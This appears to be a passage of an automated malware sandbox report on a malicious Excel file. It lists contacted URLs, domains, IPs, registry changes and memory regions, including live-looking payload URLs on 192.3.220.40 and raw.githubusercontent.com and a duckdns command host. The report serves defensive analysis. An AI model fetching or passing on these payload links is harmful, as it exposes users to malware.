unknown
|
||
http://cache.btrll.com/default/Pix-1x1.gif
|
unknown
|
||
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
|
unknown
|
||
https://www.google.com
|
unknown
|
||
http://geoplugin.net/json.gp/C
|
unknown
|
||
https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpgX
|
unknown
|
||
http://o.aolcdn.com/ads/adswrappermsni.js
|
unknown
|
||
http://cdn.taboola.com/libtrc/msn-home-network/loader.js
|
unknown
|
||
http://www.msn.com/?ocid=iehp
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
|
unknown
|
||
http://static.chartbeat.com/js/chartbeat.js
|
unknown
|
||
http://www.msn.com/de-de/?ocid=iehp
|
unknown
|
||
http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta1.1
|
unknown
|
||
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
|
unknown
|
||
https://login.yahoo.com/config/login
|
unknown
|
||
http://www.nirsoft.net/
|
unknown
|
||
http://ocsp.entrust.net0D
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
|
unknown
|
||
https://jfm.com.co/k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing®ular=orange&database=cuddly&squid
|
150.136.81.248
|
||
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
|
unknown
|
||
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
|
unknown
|
||
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
|
unknown
|
||
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
|
unknown
|
||
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://192.3.220.40/
|
unknown
|
||
https://www.ccleaner.com/go/app_cc_pro_trialkey
|
unknown
|
||
http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFp
|
unknown
|
||
https://jfm.com.co/
|
unknown
|
||
http://192.3.220.40
|
unknown
|
||
http://crl.entrust.net/server1.crl0
|
unknown
|
||
https://contextual.media.net/8/nrrV73987.js
|
unknown
|
||
http://www.imvu.com
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://contextual.media.net/
|
unknown
|
||
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
|
unknown
|
||
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
|
unknown
|
||
http://www.imvu.com/sK
|
unknown
|
||
http://www.msn.com/
|
unknown
|
||
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
|
unknown
|
||
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
https://jfm.com.co/k3l?&alloy=handsome&c
|
unknown
|
||
http://geoplugin.net/json.gp0i
|
unknown
|
||
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
|
unknown
|
||
https://raw.githubusercontent.com
|
unknown
|
||
https://jfm.com.co/k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing®ular=oran
|
unknown
|
||
http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.htahttp://192.3.220.40/450/ec/networ
|
unknown
|
||
http://192.3.220.40/Q
|
unknown
|
||
http://cdn.at.atwola.com/_media/uac/msn.html
|
unknown
|
||
https://www.google.com/accounts/servicelogin
|
unknown
|
||
http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta...
|
unknown
|
||
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
|
unknown
|
||
https://secure.comodo.com/CPS0
|
unknown
|
||
https://policies.yahoo.com/w3c/p3p.xml
|
unknown
|
||
http://192.3.220.40/450/seethebe
|
unknown
|
||
http://crl.entrust.net/2048ca.crl0
|
unknown
|
||
http://www.msn.com/advertisement.ad.js
|
unknown
|
||
http://www.ebuddy.com
|
unknown
|
There are 78 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
raw.githubusercontent.com
|
185.199.108.133
|
||
idabo.duckdns.org
|
135.148.195.248
|
||
geoplugin.net
|
178.237.33.50
|
||
jfm.com.co
|
150.136.81.248
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
135.148.195.248
|
idabo.duckdns.org
|
United States
|
||
185.199.108.133
|
raw.githubusercontent.com
|
Netherlands
|
||
192.3.220.40
|
unknown
|
United States
|
||
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
150.136.81.248
|
jfm.com.co
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
46/
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
2060
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1036
|
||
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2A62E
|
2A62E
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
7=/
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\33E29
|
33E29
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3405A
|
3405A
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\349CC
|
349CC
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Item 1
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 21
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3405A
|
3405A
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_CURRENT_USER\Software\Rmc-I89M3S
|
exepath
|
||
HKEY_CURRENT_USER\Software\Rmc-I89M3S
|
licence
|
||
HKEY_CURRENT_USER\Software\Rmc-I89M3S
|
time
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
There are 84 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
22DE000
|
stack
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
12B3E000
|
trusted library allocation
|
page read and write
|
||
855000
|
heap
|
page read and write
|
||
551000
|
heap
|
page read and write
|
||
8B9000
|
heap
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
D0000
|
heap
|
page read and write
|
||
471000
|
heap
|
page read and write
|
||
3FB000
|
heap
|
page read and write
|
||
1C70000
|
heap
|
page read and write
|
||
12501000
|
trusted library allocation
|
page read and write
|
||
1CDAC000
|
trusted library section
|
page read and write
|
||
441B000
|
heap
|
page read and write
|
||
1CD09000
|
trusted library section
|
page read and write
|
||
1CEE0000
|
trusted library section
|
page read and write
|
||
1C2C1000
|
heap
|
page read and write
|
||
1AE76000
|
heap
|
page read and write
|
||
378000
|
heap
|
page read and write
|
||
7FE89AA0000
|
trusted library allocation
|
page read and write
|
||
7FE89A47000
|
trusted library allocation
|
page read and write
|
||
3302000
|
heap
|
page read and write
|
||
3344000
|
heap
|
page read and write
|
||
1B325000
|
heap
|
page read and write
|
||
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
2F0000
|
heap
|
page read and write
|
||
3390000
|
heap
|
page read and write
|
||
441B000
|
heap
|
page read and write
|
||
7FE89B85000
|
trusted library allocation
|
page read and write
|
||
F0F000
|
stack
|
page read and write
|
||
476000
|
heap
|
page read and write
|
||
24C000
|
heap
|
page read and write
|
||
2351000
|
trusted library allocation
|
page read and write
|
||
7FE89A32000
|
trusted library allocation
|
page read and write
|
||
1AB28000
|
heap
|
page read and write
|
||
4392000
|
heap
|
page read and write
|
||
2AA000
|
heap
|
page read and write
|
||
4B0000
|
heap
|
page read and write
|
||
23FB000
|
trusted library allocation
|
page read and write
|
||
3B70000
|
trusted library allocation
|
page read and write
|
||
4A22000
|
heap
|
page read and write
|
||
1CE12000
|
trusted library section
|
page read and write
|
||
27D4000
|
trusted library allocation
|
page read and write
|
||
4776000
|
heap
|
page read and write
|
||
3007000
|
heap
|
page read and write
|
||
1CE4000
|
heap
|
page read and write
|
||
46DB000
|
heap
|
page read and write
|
||
1BA0000
|
heap
|
page read and write
|
||
14B000
|
heap
|
page read and write
|
||
4A70000
|
heap
|
page read and write
|
||
1CE95000
|
trusted library section
|
page read and write
|
||
4E2000
|
heap
|
page read and write
|
||
7FE89AC0000
|
trusted library allocation
|
page read and write
|
||
1AFB8000
|
stack
|
page read and write
|
||
32AB000
|
stack
|
page read and write
|
||
315A000
|
trusted library allocation
|
page read and write
|
||
4AD000
|
heap
|
page read and write
|
||
3388000
|
heap
|
page read and write
|
||
4A6A000
|
heap
|
page read and write
|
||
2F6000
|
heap
|
page read and write
|
||
2D5000
|
heap
|
page read and write
|
||
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
4C1000
|
heap
|
page read and write
|
||
21ED000
|
trusted library allocation
|
page read and write
|
||
1A6A0000
|
heap
|
page read and write
|
||
7FE89872000
|
trusted library allocation
|
page read and write
|
||
2FFC000
|
heap
|
page read and write
|
||
4755000
|
heap
|
page read and write
|
||
1F0000
|
trusted library allocation
|
page read and write
|
||
336A000
|
heap
|
page read and write
|
||
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
25D000
|
heap
|
page read and write
|
||
216000
|
heap
|
page read and write
|
||
43A000
|
heap
|
page read and write
|
||
47F0000
|
heap
|
page read and write
|
||
2F8C000
|
heap
|
page read and write
|
||
407000
|
heap
|
page read and write
|
||
2FD7000
|
heap
|
page read and write
|
||
425000
|
heap
|
page read and write
|
||
360F000
|
stack
|
page read and write
|
||
193000
|
stack
|
page read and write
|
||
456000
|
system
|
page execute and read and write
|
||
1A830000
|
heap
|
page execute and read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
37F000
|
heap
|
page read and write
|
||
175000
|
heap
|
page read and write
|
||
2450000
|
heap
|
page execute and read and write
|
||
4CF000
|
heap
|
page read and write
|
||
474000
|
remote allocation
|
page execute and read and write
|
||
33AF000
|
heap
|
page read and write
|
||
2769000
|
trusted library allocation
|
page read and write
|
||
3760000
|
trusted library allocation
|
page read and write
|
||
299000
|
heap
|
page read and write
|
||
33AF000
|
heap
|
page read and write
|
||
1AFCF000
|
stack
|
page read and write
|
||
1A2BF000
|
stack
|
page read and write
|
||
7FE89990000
|
trusted library allocation
|
page execute and read and write
|
||
3570000
|
heap
|
page read and write
|
||
2892000
|
trusted library allocation
|
page read and write
|
||
43AD000
|
heap
|
page read and write
|
||
7FE89AA0000
|
trusted library allocation
|
page read and write
|
||
45E000
|
heap
|
page read and write
|
||
1E0000
|
heap
|
page read and write
|
||
580000
|
heap
|
page read and write
|
||
108000
|
heap
|
page read and write
|
||
326000
|
heap
|
page read and write
|
||
339B000
|
heap
|
page read and write
|
||
7FE89A74000
|
trusted library allocation
|
page read and write
|
||
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
130000
|
heap
|
page read and write
|
||
1C16000
|
heap
|
page read and write
|
||
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
4BE000
|
heap
|
page read and write
|
||
4394000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
1AD41000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
1DD0000
|
direct allocation
|
page read and write
|
||
484000
|
heap
|
page read and write
|
||
22B000
|
stack
|
page read and write
|
||
1CFF3000
|
trusted library section
|
page read and write
|
||
12501000
|
trusted library allocation
|
page read and write
|
||
2FDA000
|
heap
|
page read and write
|
||
7FE89AC0000
|
trusted library allocation
|
page read and write
|
||
39E000
|
heap
|
page read and write
|
||
1CEDE000
|
trusted library section
|
page read and write
|
||
2425000
|
heap
|
page read and write
|
||
1AF3F000
|
stack
|
page read and write
|
||
20CF000
|
stack
|
page read and write
|
||
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
2EE000
|
stack
|
page read and write
|
||
3B80000
|
trusted library allocation
|
page read and write
|
||
3A89000
|
trusted library allocation
|
page read and write
|
||
54C000
|
heap
|
page read and write
|
||
295000
|
heap
|
page read and write
|
||
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
3344000
|
heap
|
page read and write
|
||
3940000
|
trusted library allocation
|
page read and write
|
||
1D014000
|
trusted library section
|
page read and write
|
||
108000
|
heap
|
page read and write
|
||
1C491000
|
heap
|
page read and write
|
||
2B0000
|
heap
|
page read and write
|
||
453A000
|
heap
|
page read and write
|
||
3B60000
|
trusted library allocation
|
page read and write
|
||
1CD03000
|
trusted library section
|
page read and write
|
||
3B6F000
|
trusted library allocation
|
page read and write
|
||
7FE89A90000
|
trusted library allocation
|
page execute and read and write
|
||
28F0000
|
trusted library allocation
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
53A000
|
heap
|
page read and write
|
||
7FE898B0000
|
trusted library allocation
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
7C5000
|
heap
|
page read and write
|
||
1AB09000
|
heap
|
page read and write
|
||
4341000
|
heap
|
page read and write
|
||
2B4000
|
heap
|
page read and write
|
||
4396000
|
heap
|
page read and write
|
||
2A3C000
|
stack
|
page read and write
|
||
1C3C8000
|
heap
|
page read and write
|
||
32D9000
|
heap
|
page read and write
|
||
2DB000
|
heap
|
page read and write
|
||
1A7FE000
|
stack
|
page read and write
|
||
343000
|
heap
|
page read and write
|
||
1C3F0000
|
heap
|
page read and write
|
||
1A6BE000
|
stack
|
page read and write
|
||
1A74E000
|
heap
|
page execute and read and write
|
||
43F000
|
heap
|
page read and write
|
||
2772000
|
trusted library allocation
|
page read and write
|
||
1D80000
|
direct allocation
|
page read and write
|
||
34F000
|
heap
|
page read and write
|
||
815000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
350000
|
trusted library allocation
|
page read and write
|
||
4778000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
7FE89C30000
|
trusted library allocation
|
page read and write
|
||
2FD5000
|
heap
|
page read and write
|
||
1AB1C000
|
heap
|
page read and write
|
||
5AA000
|
heap
|
page read and write
|
||
1CCE0000
|
trusted library section
|
page read and write
|
||
4532000
|
heap
|
page read and write
|
||
1B2C0000
|
heap
|
page read and write
|
||
33AF000
|
heap
|
page read and write
|
||
1AAFD000
|
heap
|
page read and write
|
||
2EC0000
|
trusted library allocation
|
page read and write
|
||
4EC5000
|
heap
|
page read and write
|
||
4778000
|
heap
|
page read and write
|
||
1A6CC000
|
stack
|
page read and write
|
||
1260D000
|
trusted library allocation
|
page read and write
|
||
69D000
|
heap
|
page read and write
|
||
3A89000
|
trusted library allocation
|
page read and write
|
||
7FE898A3000
|
trusted library allocation
|
page read and write
|
||
4168000
|
heap
|
page read and write
|
||
F70000
|
heap
|
page read and write
|
||
4EB000
|
heap
|
page read and write
|
||
1C89E000
|
stack
|
page read and write
|
||
1C7B0000
|
heap
|
page read and write
|
||
47A5000
|
heap
|
page read and write
|
||
1B320000
|
heap
|
page read and write
|
||
524000
|
heap
|
page read and write
|
||
1A79F000
|
stack
|
page read and write
|
||
453C000
|
heap
|
page read and write
|
||
3700000
|
trusted library allocation
|
page read and write
|
||
1CEE8000
|
trusted library section
|
page read and write
|
||
3EDF000
|
stack
|
page read and write
|
||
439D000
|
heap
|
page read and write
|
||
41C000
|
heap
|
page read and write
|
||
120E0000
|
trusted library allocation
|
page read and write
|
||
4160000
|
heap
|
page read and write
|
||
2763000
|
trusted library allocation
|
page read and write
|
||
2300000
|
heap
|
page read and write
|
||
539000
|
heap
|
page read and write
|
||
4B0000
|
heap
|
page read and write
|
||
2A3000
|
heap
|
page read and write
|
||
2C9000
|
heap
|
page read and write
|
||
268000
|
stack
|
page read and write
|
||
3A46000
|
trusted library allocation
|
page read and write
|
||
1CE53000
|
trusted library section
|
page read and write
|
||
400000
|
heap
|
page read and write
|
||
2FD5000
|
heap
|
page read and write
|
||
3379000
|
heap
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
1AF2E000
|
stack
|
page read and write
|
||
43AF000
|
heap
|
page read and write
|
||
2DB7000
|
trusted library allocation
|
page read and write
|
||
1C356000
|
heap
|
page read and write
|
||
46CA000
|
heap
|
page read and write
|
||
249000
|
heap
|
page read and write
|
||
53C000
|
heap
|
page read and write
|
||
2791000
|
trusted library allocation
|
page read and write
|
||
3A8F000
|
trusted library allocation
|
page read and write
|
||
2DFE000
|
stack
|
page read and write
|
||
14B000
|
heap
|
page read and write
|
||
37C000
|
heap
|
page read and write
|
||
1CEE4000
|
trusted library section
|
page read and write
|
||
7FE89C00000
|
trusted library allocation
|
page read and write
|
||
1CCA8000
|
trusted library section
|
page read and write
|
||
2D10000
|
trusted library allocation
|
page read and write
|
||
1B096000
|
heap
|
page read and write
|
||
39EE000
|
stack
|
page read and write
|
||
532000
|
heap
|
page read and write
|
||
1AC73000
|
heap
|
page read and write
|
||
3A9E000
|
stack
|
page read and write
|
||
1CE04000
|
trusted library section
|
page read and write
|
||
3A8F000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
heap
|
page read and write
|
||
23F7000
|
trusted library allocation
|
page read and write
|
||
9D0000
|
heap
|
page read and write
|
||
4B8000
|
heap
|
page read and write
|
||
270F000
|
stack
|
page read and write
|
||
7FE89A47000
|
trusted library allocation
|
page read and write
|
||
3BF000
|
heap
|
page read and write
|
||
7FE89946000
|
trusted library allocation
|
page read and write
|
||
1CFE1000
|
trusted library section
|
page read and write
|
||
168000
|
heap
|
page read and write
|
||
2A2000
|
heap
|
page read and write
|
||
433000
|
heap
|
page read and write
|
||
1D004000
|
trusted library section
|
page read and write
|
||
1ACF5000
|
heap
|
page read and write
|
||
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
4A3E000
|
heap
|
page read and write
|
||
25B0000
|
trusted library allocation
|
page read and write
|
||
3E5000
|
heap
|
page read and write
|
||
4037000
|
heap
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
1CF99000
|
trusted library section
|
page read and write
|
||
2765000
|
trusted library allocation
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
476E000
|
heap
|
page read and write
|
||
1D012000
|
trusted library section
|
page read and write
|
||
4FF000
|
heap
|
page read and write
|
||
348E000
|
stack
|
page read and write
|
||
7FE89AB0000
|
trusted library allocation
|
page read and write
|
||
1CF0000
|
heap
|
page read and write
|
||
46DB000
|
heap
|
page read and write
|
||
4400000
|
heap
|
page read and write
|
||
340000
|
heap
|
page read and write
|
||
4776000
|
heap
|
page read and write
|
||
47A1000
|
heap
|
page read and write
|
||
4A6A000
|
heap
|
page read and write
|
||
2A04000
|
trusted library allocation
|
page read and write
|
||
3D60000
|
trusted library allocation
|
page read and write
|
||
3D0000
|
heap
|
page read and write
|
||
1D045000
|
trusted library section
|
page read and write
|
||
4A6A000
|
heap
|
page read and write
|
||
279E000
|
trusted library allocation
|
page read and write
|
||
45B000
|
heap
|
page read and write
|
||
124000
|
heap
|
page read and write
|
||
8B1000
|
heap
|
page read and write
|
||
1C980000
|
heap
|
page read and write
|
||
1D00000
|
direct allocation
|
page read and write
|
||
53B000
|
heap
|
page read and write
|
||
4B7000
|
heap
|
page read and write
|
||
2B4000
|
heap
|
page read and write
|
||
7FE89A23000
|
trusted library allocation
|
page read and write
|
||
3344000
|
heap
|
page read and write
|
||
7FE89A60000
|
trusted library allocation
|
page execute and read and write
|
||
47F0000
|
heap
